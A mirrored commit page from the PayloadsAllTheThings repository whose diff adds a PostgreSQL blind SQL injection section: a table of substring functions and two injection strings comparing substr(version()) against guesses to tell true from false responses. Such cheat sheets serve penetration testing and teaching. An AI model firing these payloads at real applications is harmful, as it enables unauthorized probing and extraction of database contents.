gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-30 14:40:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

MSSQL, OracleSQL, PostgreSQL Substring Equivalent

Browse Source
This commit is contained in:
Swissky
2024-11-16 15:35:43 +01:00
parent 67af38aa4e
commit 9a908a15d2
4 changed files with 187 additions and 169 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
SQL Injection/PostgreSQL Injection.md
View File

@@ -15,6 +15,7 @@
* [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
* [PostgreSQL Blind](#postgresql-blind)
* [PostgreSQL Blind With Substring Equivalent](#postgresql-blind-with-substring-equivalent)
* [PostgreSQL Time Based](#postgresql-time-based)
* [PostgreSQL Out of Band](#postgresql-out-of-band)
* [PostgreSQL Stacked Query](#postgresql-stacked-query)
@@ -119,11 +120,22 @@ Note, with the above queries, the output needs to be assembled in memory. For la
## PostgreSQL Blind
### PostgreSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
Examples:
```sql
' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
```
## PostgreSQL Time Based
#### Identify Time Based